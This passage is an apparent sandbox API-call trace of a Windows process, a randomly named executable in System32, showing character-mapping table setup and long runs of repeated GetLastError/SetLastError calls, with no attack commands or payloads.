[0036.017] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0036.017] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f364, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0036.017] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f364, cbMultiByte=256, lpWideCharStr=0x18ec98, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ钐矲狰Ā") returned 256 [0036.017] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ钐矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0036.017] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ钐矲狰Ā", cchSrc=256, lpDestStr=0x18ea88, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0036.017] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18f264, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÃN\x96õ\x9cô\x18", lpUsedDefaultChar=0x0) returned 256 [0036.018] GetLastError () returned 0x0 [0036.018] SetLastError (dwErrCode=0x0) [0036.018] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f364, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0036.018] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f364, cbMultiByte=256, lpWideCharStr=0x18ecb8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ钐矲狰Ā") returned 256 [0036.018] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ钐矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0036.018] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ钐矲狰Ā", cchSrc=256, lpDestStr=0x18eaa8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0036.018] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18f164, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÃN\x96õ\x9cô\x18", lpUsedDefaultChar=0x0) returned 256 [0036.018] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0036.018] GetLastError () returned 0x0 [0036.018] SetLastError (dwErrCode=0x0) [0036.018] GetLastError () returned 0x0 [0036.018] SetLastError (dwErrCode=0x0) [0036.018] GetLastError () returned 0x0 [0036.018] SetLastError (dwErrCode=0x0) [0036.018] GetLastError () returned 0x0 [0036.018] SetLastError (dwErrCode=0x0) [0036.018] GetLastError () returned 0x0 [0036.018] SetLastError (dwErrCode=0x0) [0036.018] GetLastError () returned 0x0 [0036.018] SetLastError (dwErrCode=0x0) [0036.018] GetLastError () returned 0x0 [0036.018] SetLastError (dwErrCode=0x0) [0036.018] GetLastError () returned 0x0 [0036.018] SetLastError (dwErrCode=0x0) [0036.018] GetLastError () returned 0x0 [0036.018] SetLastError (dwErrCode=0x0) [0036.018] GetLastError () returned 0x0 [0036.018] SetLastError (dwErrCode=0x0) [0036.018] GetLastError () returned 0x0 [0036.018] SetLastError (dwErrCode=0x0) [0036.018] GetLastError () returned 0x0 [0036.019] SetLastError (dwErrCode=0x0) [0036.019] GetLastError () returned 0x0 [0036.019] SetLastError (dwErrCode=0x0) [0036.019] GetLastError () returned 0x0 [0036.019] SetLastError (dwErrCode=0x0) [0036.019] GetLastError () returned 0x0 [0036.019] SetLastError (dwErrCode=0x0) [0036.019] GetLastError () returned 0x0 [0036.019] SetLastError (dwErrCode=0x0) [0036.019] GetLastError () returned 0x0 [0036.019] SetLastError (dwErrCode=0x0) [0036.019] GetLastError () returned 0x0 [0036.019] SetLastError (dwErrCode=0x0) [0036.019] GetLastError () returned 0x0 [0036.019] SetLastError (dwErrCode=0x0) [0036.019] GetLastError () returned 0x0 [0036.019] SetLastError (dwErrCode=0x0) [0036.019] GetLastError () returned 0x0 [0036.019] SetLastError (dwErrCode=0x0) [0036.019] GetLastError () returned 0x0 [0036.019] SetLastError (dwErrCode=0x0) [0036.019] GetLastError () returned 0x0 [0036.019] SetLastError (dwErrCode=0x0) [0036.019] GetLastError () returned 0x0 [0036.019] SetLastError (dwErrCode=0x0) [0036.019] GetLastError () returned 0x0 [0036.028] SetLastError (dwErrCode=0x0) [0036.028] GetLastError () returned 0x0 [0036.028] SetLastError (dwErrCode=0x0) [0036.028] GetLastError () returned 0x0 [0036.028] SetLastError (dwErrCode=0x0) [0036.028] GetLastError () returned 0x0 [0036.028] SetLastError (dwErrCode=0x0) [0036.028] GetLastError () returned 0x0 [0036.028] SetLastError (dwErrCode=0x0) [0036.028] GetLastError () returned 0x0 [0036.028] SetLastError (dwErrCode=0x0) [0036.028] GetLastError () returned 0x0 [0036.028] SetLastError (dwErrCode=0x0) [0036.028] GetLastError () returned 0x0 [0036.028] SetLastError (dwErrCode=0x0) [0036.028] GetLastError () returned 0x0 [0036.028] SetLastError (dwErrCode=0x0) [0036.028] GetLastError () returned 0x0 [0036.028] SetLastError (dwErrCode=0x0) [0036.028] GetLastError () returned 0x0 [0036.028] SetLastError (dwErrCode=0x0) [0036.028] GetLastError () returned 0x0 [0036.028] SetLastError (dwErrCode=0x0) [0036.028] GetLastError () returned 0x0 [0036.028] SetLastError (dwErrCode=0x0) [0036.028] GetLastError () returned 0x0 [0036.028] SetLastError (dwErrCode=0x0) [0036.028] GetLastError () returned 0x0 [0036.028] SetLastError (dwErrCode=0x0) [0036.028] GetLastError () returned 0x0 [0036.029] SetLastError (dwErrCode=0x0) [0036.029] GetLastError () returned 0x0 [0036.029] SetLastError (dwErrCode=0x0) [0036.029] GetLastError () returned 0x0 [0036.029] SetLastError (dwErrCode=0x0) [0036.029] GetLastError () returned 0x0 [0036.029] SetLastError (dwErrCode=0x0) [0036.029] GetLastError () returned 0x0 [0036.029] SetLastError (dwErrCode=0x0) [0036.029] GetLastError () returned 0x0 [0036.029] SetLastError (dwErrCode=0x0) [0036.029] GetLastError () returned 0x0 [0036.029] SetLastError (dwErrCode=0x0) [0036.029] GetLastError () returned 0x0 [0036.029] SetLastError (dwErrCode=0x0) [0036.029] GetLastError () returned 0x0 [0036.029] SetLastError (dwErrCode=0x0) [0036.029] GetLastError () returned 0x0 [0036.029] SetLastError (dwErrCode=0x0) [0036.029] GetLastError () returned 0x0 [0036.029] SetLastError (dwErrCode=0x0) [0036.029] GetLastError () returned 0x0 [0036.029] SetLastError (dwErrCode=0x0) [0036.029] GetLastError () returned 0x0 [0036.029] SetLastError (dwErrCode=0x0) [0036.029] GetLastError () returned 0x0 [0036.029] SetLastError (dwErrCode=0x0) [0036.029] GetLastError () returned 0x0 [0036.029] SetLastError (dwErrCode=0x0) [0036.029] GetLastError () returned 0x0 [0036.029] SetLastError (dwErrCode=0x0) [0036.029] GetLastError () returned 0x0 [0036.029] SetLastError (dwErrCode=0x0) [0036.029] GetLastError () returned 0x0 [0036.030] SetLastError (dwErrCode=0x0) [0036.030] GetLastError () returned 0x0 [0036.030] SetLastError (dwErrCode=0x0) [0036.030] GetLastError () returned 0x0 [0036.030] SetLastError (dwErrCode=0x0) [0036.030] GetLastError () returned 0x0 [0036.030] SetLastError (dwErrCode=0x0) [0036.030] GetLastError () returned 0x0 [0036.030] SetLastError (dwErrCode=0x0) [0036.030] GetLastError () returned 0x0 [0036.030] SetLastError (dwErrCode=0x0) [0036.030] GetLastError () returned 0x0 [0036.030] SetLastError (dwErrCode=0x0) [0036.030] GetLastError () returned 0x0 [0036.030] SetLastError (dwErrCode=0x0) [0036.030] GetLastError () returned 0x0 [0036.030] SetLastError (dwErrCode=0x0) [0036.030] GetLastError () returned 0x0 [0036.030] SetLastError (dwErrCode=0x0) [0036.030] GetLastError () returned 0x0 [0036.030] SetLastError (dwErrCode=0x0) [0036.030] GetLastError () returned 0x0 [0036.030] SetLastError (dwErrCode=0x0) [0036.030] GetLastError () returned 0x0 [0036.030] SetLastError (dwErrCode=0x0) [0036.030] GetLastError () returned 0x0 [0036.030] SetLastError (dwErrCode=0x0) [0036.030] GetLastError () returned 0x0 [0036.030] SetLastError (dwErrCode=0x0) [0036.030] GetLastError () returned 0x0 [0036.030] SetLastError (dwErrCode=0x0) [0036.030] GetLastError () returned 0x0 [0036.030] SetLastError (dwErrCode=0x0) [0036.031] GetLastError () returned 0x0 [0036.031] SetLastError (dwErrCode=0x0) [0036.031] GetLastError () returned 0x0 [0036.031] SetLastError (dwErrCode=0x0) [0036.031] GetLastError () returned 0x0 [0036.031] SetLastError (dwErrCode=0x0) [0036.031] GetLastError () returned 0x0 [0036.031] SetLastError (dwErrCode=0x0) [0036.031] GetLastError () returned 0x0 [0036.031] SetLastError (dwErrCode=0x0) [0036.031] GetLastError () returned 0x0 [0036.031] SetLastError (dwErrCode=0x0) [0036.031] GetLastError () returned 0x0 [0036.031] SetLastError (dwErrCode=0x0) [0036.031] GetLastError () returned 0x0 [0036.031] SetLastError (dwErrCode=0x0) [0036.031] GetLastError () returned 0x0 [0036.031] SetLastError (dwErrCode=0x0) [0036.031] GetLastError () returned 0x0 [0036.031] SetLastError (dwErrCode=0x0) [0036.031] GetLastError () returned 0x0 [0036.031] SetLastError (dwErrCode=0x0) [0036.031] GetLastError () returned 0x0 [0036.031] SetLastError (dwErrCode=0x0) [0036.031] GetLastError () returned 0x0 [0036.031] SetLastError (dwErrCode=0x0) [0036.031] GetLastError () returned 0x0 [0036.031] SetLastError (dwErrCode=0x0) [0036.031] GetLastError () returned 0x0 [0036.031] SetLastError (dwErrCode=0x0) [0036.031] GetLastError () returned 0x0 [0036.031] SetLastError (dwErrCode=0x0) [0036.031] GetLastError () returned 0x0 [0036.031] SetLastError (dwErrCode=0x0) [0036.032] GetLastError () returned 0x0 [0036.032] SetLastError (dwErrCode=0x0) [0036.032] GetLastError () returned 0x0 [0036.032] SetLastError (dwErrCode=0x0) [0036.032] GetLastError () returned 0x0 [0036.032] SetLastError (dwErrCode=0x0) [0036.032] GetLastError () returned 0x0 [0036.032] SetLastError (dwErrCode=0x0) [0036.032] GetLastError () returned 0x0 [0036.032] SetLastError (dwErrCode=0x0) [0036.032] GetLastError () returned 0x0 [0036.032] SetLastError (dwErrCode=0x0) [0036.032] GetLastError () returned 0x0 [0036.032] SetLastError (dwErrCode=0x0) [0036.032] GetLastError () returned 0x0 [0036.032] SetLastError (dwErrCode=0x0) [0036.032] GetLastError () returned 0x0 [0036.032] SetLastError (dwErrCode=0x0) [0036.032] GetLastError () returned 0x0 [0036.032] SetLastError (dwErrCode=0x0) [0036.032] GetLastError () returned 0x0 [0036.032] SetLastError (dwErrCode=0x0) [0036.032] GetLastError () returned 0x0 [0036.032] SetLastError (dwErrCode=0x0) [0036.032] GetLastError () returned 0x0 [0036.032] SetLastError (dwErrCode=0x0) [0036.032] GetLastError () returned 0x0 [0036.032] SetLastError (dwErrCode=0x0) [0036.032] GetLastError () returned 0x0 [0036.032] SetLastError (dwErrCode=0x0) [0036.032] GetLastError () returned 0x0 [0036.032] SetLastError (dwErrCode=0x0) [0036.032] GetLastError () returned 0x0 [0036.032] SetLastError (dwErrCode=0x0) [0036.032] GetLastError () returned 0x0 [0036.033] SetLastError (dwErrCode=0x0) [0036.033] GetLastError () returned 0x0 [0036.033] SetLastError (dwErrCode=0x0) [0036.033] GetLastError () returned 0x0 [0036.033] SetLastError (dwErrCode=0x0) [0036.033] GetLastError () returned 0x0 [0036.033] SetLastError (dwErrCode=0x0) [0036.033] GetLastError () returned 0x0 [0036.033] SetLastError (dwErrCode=0x0) [0036.033] GetLastError () returned 0x0 [0036.033] SetLastError (dwErrCode=0x0) [0036.033] GetLastError () returned 0x0 [0036.033] SetLastError (dwErrCode=0x0) [0036.033] GetLastError () returned 0x0 [0036.033] SetLastError (dwErrCode=0x0) [0036.033] GetLastError () returned 0x0 [0036.033] SetLastError (dwErrCode=0x0) [0036.033] GetLastError () returned 0x0 [0036.033] SetLastError (dwErrCode=0x0) [0036.033] GetLastError () returned 0x0 [0036.033] SetLastError (dwErrCode=0x0) [0036.033] GetLastError () returned 0x0 [0036.033] SetLastError (dwErrCode=0x0) [0036.033] GetLastError () returned 0x0 [0036.033] SetLastError (dwErrCode=0x0) [0036.033] GetLastError () returned 0x0 [0036.033] SetLastError (dwErrCode=0x0) [0036.033] GetLastError () returned 0x0 [0036.033] SetLastError (dwErrCode=0x0) [0036.033] GetLastError () returned 0x0 [0036.033] SetLastError (dwErrCode=0x0) [0036.033] GetLastError () returned 0x0 [0036.033] SetLastError (dwErrCode=0x0) [0036.033] GetLastError () returned 0x0 [0036.034] SetLastError (dwErrCode=0x0) [0036.034] GetLastError () returned 0x0 [0036.034] SetLastError (dwErrCode=0x0) [0036.034] GetLastError () returned 0x0 [0036.034] SetLastError (dwErrCode=0x0) [0036.034] GetLastError () returned 0x0 [0036.034] SetLastError (dwErrCode=0x0) [0036.034] GetLastError () returned 0x0 [0036.034] SetLastError (dwErrCode=0x0) [0036.034] GetLastError () returned 0x0 [0036.034] SetLastError (dwErrCode=0x0) [0036.034] GetLastError () returned 0x0 [0036.034] SetLastError (dwErrCode=0x0) [0036.034] GetLastError () returned 0x0 [0036.034] SetLastError (dwErrCode=0x0) [0036.034] GetLastError () returned 0x0 [0036.034] SetLastError (dwErrCode=0x0) [0036.034] GetLastError () returned 0x0 [0036.034] SetLastError (dwErrCode=0x0) [0036.034] GetLastError () returned 0x0 [0036.034] SetLastError (dwErrCode=0x0) [0036.034] GetLastError () returned 0x0 [0036.034] SetLastError (dwErrCode=0x0) [0036.034] GetLastError () returned 0x0 [0036.034] SetLastError (dwErrCode=0x0) [0036.034] GetLastError () returned 0x0 [0036.034] SetLastError (dwErrCode=0x0) [0036.034] GetLastError () returned 0x0 [0036.034] SetLastError (dwErrCode=0x0) [0036.034] GetLastError () returned 0x0 [0036.034] SetLastError (dwErrCode=0x0) [0036.034] GetLastError () returned 0x0 [0036.034] SetLastError (dwErrCode=0x0) [0036.034] GetLastError () returned 0x0 [0036.035] SetLastError (dwErrCode=0x0) [0036.035] GetLastError () returned 0x0 [0036.035] SetLastError (dwErrCode=0x0) [0036.035] GetLastError () returned 0x0 [0036.035] SetLastError (dwErrCode=0x0) [0036.035] GetLastError () returned 0x0 [0036.035] SetLastError (dwErrCode=0x0) [0036.035] GetLastError () returned 0x0 [0036.035] SetLastError (dwErrCode=0x0) [0036.035] GetLastError () returned 0x0 [0036.035] SetLastError (dwErrCode=0x0) [0036.035] GetLastError () returned 0x0 [0036.035] SetLastError (dwErrCode=0x0) [0036.035] GetLastError () returned 0x0 [0036.035] SetLastError (dwErrCode=0x0) [0036.035] GetLastError () returned 0x0 [0036.035] SetLastError (dwErrCode=0x0) [0036.035] GetLastError () returned 0x0 [0036.035] SetLastError (dwErrCode=0x0) [0036.035] GetLastError () returned 0x0 [0036.035] SetLastError (dwErrCode=0x0) [0036.035] GetLastError () returned 0x0 [0036.035] SetLastError (dwErrCode=0x0) [0036.035] GetLastError () returned 0x0 [0036.035] SetLastError (dwErrCode=0x0) [0036.035] GetLastError () returned 0x0 [0036.035] SetLastError (dwErrCode=0x0) [0036.035] GetLastError () returned 0x0 [0036.035] SetLastError (dwErrCode=0x0) [0036.035] GetLastError () returned 0x0 [0036.035] SetLastError (dwErrCode=0x0) [0036.035] GetLastError () returned 0x0 [0036.036] SetLastError (dwErrCode=0x0) [0036.036] GetLastError () returned 0x0 [0036.036] SetLastError (dwErrCode=0x0) [0036.036] GetLastError () returned 0x0 [0036.036] SetLastError (dwErrCode=0x0) [0036.036] GetLastError () returned 0x0 [0036.036] SetLastError (dwErrCode=0x0) [0036.036] GetLastError () returned 0x0 [0036.036] SetLastError (dwErrCode=0x0) [0036.036] GetLastError () returned 0x0 [0036.036] SetLastError (dwErrCode=0x0) [0036.036] GetLastError () returned 0x0 [0036.036] SetLastError (dwErrCode=0x0) [0036.036] GetLastError () returned 0x0 [0036.036] SetLastError (dwErrCode=0x0) [0036.036] GetLastError () returned 0x0 [0036.036] SetLastError (dwErrCode=0x0) [0036.036] GetLastError () returned 0x0 [0036.036] SetLastError (dwErrCode=0x0) [0036.036] GetLastError () returned 0x0 [0036.036] SetLastError (dwErrCode=0x0) [0036.036] GetLastError () returned 0x0 [0036.036] SetLastError (dwErrCode=0x0) [0036.036] GetLastError () returned 0x0 [0036.036] SetLastError (dwErrCode=0x0) [0036.036] GetLastError () returned 0x0 [0036.036] SetLastError (dwErrCode=0x0) [0036.036] GetLastError () returned 0x0 [0036.036] SetLastError (dwErrCode=0x0) [0036.036] GetLastError () returned 0x0 [0036.036] SetLastError (dwErrCode=0x0) [0036.036] GetLastError () returned 0x0 [0036.036] SetLastError (dwErrCode=0x0) [0036.037] GetLastError () returned 0x0 [0036.037] SetLastError (dwErrCode=0x0) [0036.037] GetLastError () returned 0x0 [0036.037] SetLastError (dwErrCode=0x0) [0036.037] GetLastError () returned 0x0 [0036.037] 